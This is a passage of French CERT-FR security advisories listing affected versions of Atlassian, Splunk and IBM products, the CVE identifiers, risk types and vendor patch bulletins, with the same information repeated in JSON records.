De multiples vulnérabilités ont été découvertes dans les produits Atlassian. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Atlassian | Jira | Jira Software Server versions 11.3.x antérieures à 11.3.0 | ||
| Atlassian | Confluence | Confluence Server versions antérieures à 8.5.31 | ||
| Atlassian | Jira | Jira Service Management Data Center versions antérieures à 5.12.29 | ||
| Atlassian | Jira | Jira Service Management Server versions 11.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 11.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Data Center versions 11.2.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Server versions 11.2.x antérieures à 11.2.1 | ||
| Atlassian | Jira | Jira Software Data Center versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions 11.3.x antérieures à 11.3.0 | ||
| Atlassian | Confluence | Confluence Server versions 9.x antérieures à 9.2.13 | ||
| Atlassian | Confluence | Confluence Data Center versions 10.x antérieures à 10.2.2 | ||
| Atlassian | Jira | Jira Software Data Center versions antérieures à 9.12.26 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 11.3.x antérieures à 11.3.1 | ||
| Atlassian | Confluence | Confluence Data Center versions antérieures à 8.5.31 | ||
| Atlassian | Jira | Jira Software Server versions antérieures à 9.12.26 | ||
| Atlassian | Confluence | Confluence Data Center versions 9.x antérieures à 9.2.13 | ||
| Atlassian | Jira | Jira Service Management Data Center versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Software Server versions 10.x antérieures à 10.3.16 | ||
| Atlassian | Jira | Jira Service Management Server versions antérieures à 5.12.29 | ||
| Atlassian | Jira | Jira Software Data Center versions 11.3.x antérieures à 11.3.0 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Jira Software Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Server versions ant\u00e9rieures \u00e0 8.5.31",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions ant\u00e9rieures \u00e0 5.12.29",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 11.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 11.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions 11.2.x ant\u00e9rieures \u00e0 11.2.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Server versions 9.x ant\u00e9rieures \u00e0 9.2.13",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions 10.x ant\u00e9rieures \u00e0 10.2.2",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions ant\u00e9rieures \u00e0 9.12.26",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.1",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions ant\u00e9rieures \u00e0 8.5.31",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions ant\u00e9rieures \u00e0 9.12.26",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Confluence Data Center versions 9.x ant\u00e9rieures \u00e0 9.2.13",
"product": {
"name": "Confluence",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Data Center versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Server versions 10.x ant\u00e9rieures \u00e0 10.3.16",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Service Management Server versions ant\u00e9rieures \u00e0 5.12.29",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
},
{
"description": "Jira Software Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.0",
"product": {
"name": "Jira",
"vendor": {
"name": "Atlassian",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-49146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49146"
},
{
"name": "CVE-2022-25883",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25883"
},
{
"name": "CVE-2025-66516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66516"
},
{
"name": "CVE-2025-15284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15284"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2021-3807",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3807"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2022-45693",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45693"
},
{
"name": "CVE-2025-54988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2025-53689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53689"
}
],
"initial_release_date": "2026-01-21T00:00:00",
"last_revision_date": "2026-01-21T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0065",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-01-21T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Atlassian. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Atlassian",
"vendor_advisories": [
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26667",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26667"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16497",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16497"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16496",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16496"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101827",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101827"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26665",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26665"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16485",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16485"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26661",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26661"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16491",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16491"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101878",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101878"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16501",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16501"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26663",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26663"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16503",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16503"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26662",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26662"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16459",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16459"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26654",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26654"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26656",
"url": "https://jira.atlassian.com/browse/JSWSERVER-26656"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101872",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101872"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16502",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16502"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-101842",
"url": "https://jira.atlassian.com/browse/CONFSERVER-101842"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16499",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16499"
},
{
"published_at": "2026-01-20",
"title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16465",
"url": "https://jira.atlassian.com/browse/JSDSERVER-16465"
}
]
}
CERTFR-2026-AVI-0118
Vulnerability from certfr_avis - Published: 2026-02-05 - Updated: 2026-02-05
De multiples vulnérabilités ont été découvertes dans les produits Splunk. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Splunk SOAR versions ant\u00e9rieures \u00e0 7.1.0",
"product": {
"name": "SOAR",
"vendor": {
"name": "Splunk",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-32873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32873"
},
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-57810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57810"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-47287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47287"
}
],
"initial_release_date": "2026-02-05T00:00:00",
"last_revision_date": "2026-02-05T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0118",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-05T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Splunk. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Splunk",
"vendor_advisories": [
{
"published_at": "2026-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 Splunk SVD-2026-0201",
"url": "https://advisory.splunk.com/advisories/SVD-2026-0201"
}
]
}
CERTFR-2026-AVI-0327
Vulnerability from certfr_avis - Published: 2026-03-20 - Updated: 2026-03-20
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.1.x antérieures à 6.1.2.8 | ||
| IBM | Sterling | Sterling Control Center versions 6.4.2.x antérieures à 6.4.2.0 iFix01 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x antérieures à 6.2.2.0_1 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W6 | ||
| IBM | WebSphere | WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité PH69757 et PH69729 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.x antérieures à 6.2.0.5_2 | ||
| IBM | QRadar SIEM | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP15 | ||
| IBM | QRadar Suite Software | QRadar Suite Software versions 1.10.12.x antérieures à 1.11.9.0 | ||
| IBM | Sterling | Sterling Control Center versions 6.3.1.x antérieures à 6.3.1.0 iFix07 | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.10.x antérieures à 1.11.9.0 | ||
| IBM | Sterling | Sterling Control Center versions 6.4.1.x antérieures à 6.4.1.0 iFix01 | ||
| IBM | Sterling B2B Integrator | Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x antérieures à 6.2.1.1_2 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.1.x ant\u00e9rieures \u00e0 6.1.2.8",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.4.2.x ant\u00e9rieures \u00e0 6.4.2.0 iFix01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.2.x ant\u00e9rieures \u00e0 6.2.2.0_1",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W6",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 PH69757 et PH69729",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.5_2",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP15",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.10.12.x ant\u00e9rieures \u00e0 1.11.9.0",
"product": {
"name": "QRadar Suite Software",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.3.1.x ant\u00e9rieures \u00e0 6.3.1.0 iFix07",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.10.x ant\u00e9rieures \u00e0 1.11.9.0",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.4.1.x ant\u00e9rieures \u00e0 6.4.1.0 iFix01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling B2B Integrator et Sterling File Gateway versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.1_2",
"product": {
"name": "Sterling B2B Integrator",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-32996",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32996"
},
{
"name": "CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
},
{
"name": "CVE-2025-14242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14242"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2025-12084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
},
{
"name": "CVE-2025-53905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
},
{
"name": "CVE-2025-6176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6176"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2025-15367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
},
{
"name": "CVE-2025-39933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39933"
},
{
"name": "CVE-2025-22150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22150"
},
{
"name": "CVE-2022-46337",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46337"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2025-5372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5372"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2026-21925",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21925"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2025-6545",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6545"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-55173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55173"
},
{
"name": "CVE-2025-4897",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4897"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-57752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57752"
},
{
"name": "CVE-2025-32997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32997"
},
{
"name": "CVE-2026-1188",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1188"
},
{
"name": "CVE-2023-53552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53552"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-66471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66471"
},
{
"name": "CVE-2026-21441",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21441"
},
{
"name": "CVE-2025-57350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57350"
},
{
"name": "CVE-2025-66453",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66453"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2025-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
},
{
"name": "CVE-2026-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0865"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-58457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58457"
},
{
"name": "CVE-2025-48913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48913"
},
{
"name": "CVE-2025-59250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59250"
},
{
"name": "CVE-2025-14104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14104"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2025-64775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64775"
},
{
"name": "CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2025-9086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
},
{
"name": "CVE-2020-7660",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-7660"
},
{
"name": "CVE-2024-29371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29371"
},
{
"name": "CVE-2025-38403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38403"
},
{
"name": "CVE-2025-14031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14031"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2022-50865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
},
{
"name": "CVE-2023-44483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44483"
},
{
"name": "CVE-2026-1299",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2026-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21945"
},
{
"name": "CVE-2026-1264",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1264"
},
{
"name": "CVE-2025-53906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-8916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8916"
},
{
"name": "CVE-2025-66675",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66675"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2025-38051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2025-6547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6547"
},
{
"name": "CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"name": "CVE-2025-57352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57352"
},
{
"name": "CVE-2024-26766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26766"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
}
],
"initial_release_date": "2026-03-20T00:00:00",
"last_revision_date": "2026-03-20T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0327",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-20T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
